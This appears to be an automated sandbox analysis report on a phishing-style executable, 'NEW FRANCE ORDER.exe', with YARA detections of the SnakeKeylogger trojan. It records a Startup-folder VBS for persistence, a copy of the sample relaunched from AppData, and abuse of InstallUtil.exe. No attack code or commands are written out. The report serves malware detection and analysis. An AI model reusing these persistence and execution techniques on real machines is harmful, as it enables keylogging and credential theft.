Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06127210 10_2_06127210
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06127220 10_2_06127220
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06126E4A 10_2_06126E4A
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06127220 10_2_06127220
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06129751 10_2_06129751
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06129760 10_2_06129760
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0612001E 10_2_0612001E
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06120040 10_2_06120040
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06128170 10_2_06128170
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06128160 10_2_06128160
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06132C98 10_2_06132C98
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06135117 10_2_06135117
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_06132C8B 10_2_06132C8B
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0614D018 10_2_0614D018
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A7420 10_2_061A7420
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A0D4A 10_2_061A0D4A
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061ADB70 10_2_061ADB70
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061AA6D8 10_2_061AA6D8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061AA6C8 10_2_061AA6C8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A77BD 10_2_061A77BD
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A741B 10_2_061A741B
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A7419 10_2_061A7419
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A0006 10_2_061A0006
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A0040 10_2_061A0040
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061AF168 10_2_061AF168
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061ADE97 10_2_061ADE97
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_061A99F1 10_2_061A99F1
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_064CEA08 10_2_064CEA08
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_064B0040 10_2_064B0040
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_064B0006 10_2_064B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010DCE20 11_2_010DCE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010D1BA4 11_2_010D1BA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010DE068 11_2_010DE068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010D1030 11_2_010D1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010D1040 11_2_010D1040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_010D3490 11_2_010D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150C147 11_2_0150C147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_01505370 11_2_01505370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150D278 11_2_0150D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150C468 11_2_0150C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150C738 11_2_0150C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150E988 11_2_0150E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_015069A0 11_2_015069A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150CA08 11_2_0150CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_01509DE0 11_2_01509DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150CCD8 11_2_0150CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_01506FC8 11_2_01506FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150CFA9 11_2_0150CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150E97B 11_2_0150E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_0150F961 11_2_0150F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_015029EC 11_2_015029EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_01503AA1 11_2_01503AA1
Sample file is different than original file name gathered from version info
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1300438282.00000000061F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameYgwwafygojh.dll" vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003631000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000000.1169932223.000000000100E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1289695539.00000000016DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Uses 32bit PE files
Source: NEW FRANCE ORDER.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: NEW FRANCE ORDER.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IsSingleByte.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NEW FRANCE ORDER.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: NEW FRANCE ORDER.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: NEW FRANCE ORDER.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: IsSingleByte.exe.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: IsSingleByte.exe.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: IsSingleByte.exe.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs"
Source: NEW FRANCE ORDER.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NEW FRANCE ORDER.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: NEW FRANCE ORDER.exe Virustotal: Detection: 56%
Source: NEW FRANCE ORDER.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File read: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NEW FRANCE ORDER.exe "C:\Users\user\Desktop\NEW FRANCE ORDER.exe"
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe"
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
